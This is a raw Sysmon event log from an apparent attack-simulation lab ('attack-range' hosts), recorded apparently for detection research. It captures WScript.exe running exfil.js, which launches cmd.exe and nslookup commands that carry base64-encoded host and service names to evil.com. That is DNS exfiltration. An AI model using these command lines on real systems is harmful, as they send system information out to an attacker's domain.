14:16:31.080{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6240-000000005F02}5568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-17A1-629A-783D-000000005F02}55527840C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-6240-000000005F02}5568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.089{2E1864BB-17BF-629A-6240-000000005F02}5568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljgvj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.080{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkbfnx.tmpMD5=E7F6E6FF66DADCE192851D5CEE89C151,SHA256=52916EC751E038AB876F6BC77E3DDBA879A78F00C8F4A0915C022D7C501FFEAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-17BF-629A-6040-000000005F02}21927260C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6140-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6140-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.049{2E1864BB-17BF-629A-5F40-000000005F02}20202060C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-6140-000000005F02}7320C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.056{2E1864BB-17BF-629A-6140-000000005F02}7320C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-5F40-000000005F02}2020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkbfnx.tmp 2>&1 10341000x8000000000000000200217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.017{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6040-000000005F02}2192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.017{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6040-000000005F02}2192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.017{2E1864BB-17BF-629A-6040-000000005F02}21927260C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-5F40-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6040-000000005F02}2192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-5F40-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.996{2E1864BB-17A1-629A-783D-000000005F02}55527252C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-5F40-000000005F02}2020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.001{2E1864BB-17BF-629A-5F40-000000005F02}2020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkbfnx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000043937Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:31.589{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E7D382BD49C5AAE2F60BD50EC1D5C86,SHA256=99185B523FE5D0A140A3F898E70029498B908509290444FB6A29BED112DC56EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000200897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.341{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52755- 354300x8000000000000000200896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.341{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52754- 10341000x8000000000000000200895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.963{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-A240-000000005F02}3848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.963{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-A240-000000005F02}3848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.963{2E1864BB-17C0-629A-A240-000000005F02}38487468C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-A140-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.948{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-A240-000000005F02}3848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 